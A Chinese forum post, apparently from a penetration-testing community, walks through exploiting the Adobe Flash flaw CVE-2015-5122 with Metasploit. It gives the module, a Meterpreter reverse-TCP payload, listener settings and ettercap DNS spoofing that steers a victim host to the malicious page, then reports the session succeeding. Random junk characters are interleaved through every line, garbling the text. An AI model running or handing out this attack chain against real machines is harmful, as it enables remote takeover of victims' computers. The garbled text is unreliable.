. t; i; |. b2 I5 b: c0 b 二、cve2015-5122漏洞实例演示虚拟机
; K2 J2 r0 ?# W. J V y" o$ V1 F |' h- l# T/ b/ W 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
search cve-2015-5122如图: % A% ?* c( P6 h5 u! H0 J
6 T6 F8 D- {5 w9 [1 n; @- [$ w$ K5 t- i4 J0 a
6 `6 ~2 l% d; t2 N3 P) n
下面我们敲如下命令:
4 l9 V: p/ q/ c1 R, u. Q7 [4 c[$ \ i$ r' g7 s5 z use exploit/multi/browser/adobe_flash_opaque_background_uaf
# t, ?% ?9 U% P- E$ z# b& q$ W: A* F0 } set PAYLOAD windows/meterpreter/reverse_tcp $ U" b, V! C- w: {8 a$ N
" w! Q+ E! L$ [1 W# V$ c5 n set LHOST 192.168.0.109
( E' I" P; R; t: Q. C0 | set URIPATH / /*根目录*/
. s+ l! Y! p4 h) j) P) c- Aset SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 1 r' G- J2 k7 v' G2 C/ m
1 B8 e5 R1 f( V7 c( U2 Q, X set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # {9 p. o, v( ?8 o# [8 p( T
2 I8 y8 i- F& G- ~3 \" o# b 然后show options如图:
; u7 y$ M. W* i! l1 ~" e0 V
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
7 c2 \3 u- s8 r6 ~ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 J" E2 a6 N0 r% _
, j- N3 w) b" W4 b$ S$ P" [# r! k$ N; W2 K
成功了,这时候我们断开ettercap,如图:
5 F" S3 b j. N1 C9 b
4 K, B n$ y4 f Screenshot如图: 4 Z# i2 Q; X8 z' S' f
1 i0 g$ b/ \" v/ [1 b' s
9 x- d* J" W8 F0 Z- [8 O
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |